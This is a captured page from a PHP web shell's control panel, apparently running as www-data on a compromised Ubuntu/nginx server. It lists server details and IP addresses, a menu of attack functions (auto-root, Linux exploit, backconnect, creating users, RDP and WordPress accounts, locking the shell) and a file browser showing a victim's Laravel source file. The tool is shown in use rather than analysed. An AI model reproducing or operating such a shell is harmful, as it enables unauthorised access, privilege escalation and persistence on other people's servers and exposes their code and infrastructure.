Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sdgamatya /
app /
Http /
ViewComposers /
[ HOME SHELL ]
Name
Size
Permission
Action
NotificationComposer.php
1.55
KB
-rw-r--r--
NotificationComposer_backup.ph...
1.61
KB
-rw-r--r--
SettingsComposer.php
289
B
-rw-r--r--
SidebarComposer.php
941
B
-rw-r--r--
SloganComposer.php
497
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : SidebarComposer.php
<?php namespace App\Http\ViewComposers; use Illuminate\View\View; use Sentinel; use App\Model\Company; use DB; class SidebarComposer{ public $data = []; public function __construct() { $company_id = Company::where(['user_id'=>\Sentinel:: getUser()->id])->first()->id; $this->data['companywise_rate'] = DB::table('view_company_rate')->where('user_id',\Sentinel:: getUser()->id)->first(); $receiveID = DB::table('receive')->where('company_id',$company_id)->orderBy('id', 'DESC')->first(); if($receiveID){ $this->data['receive_id'] = $receiveID->id; }else{ $this->data['receive_id'] = 0; } } /** * Bind data to the view. * * @param View $view * @return void */ public function compose(View $view) { $view->with('data_rate',$this->data); } }
Close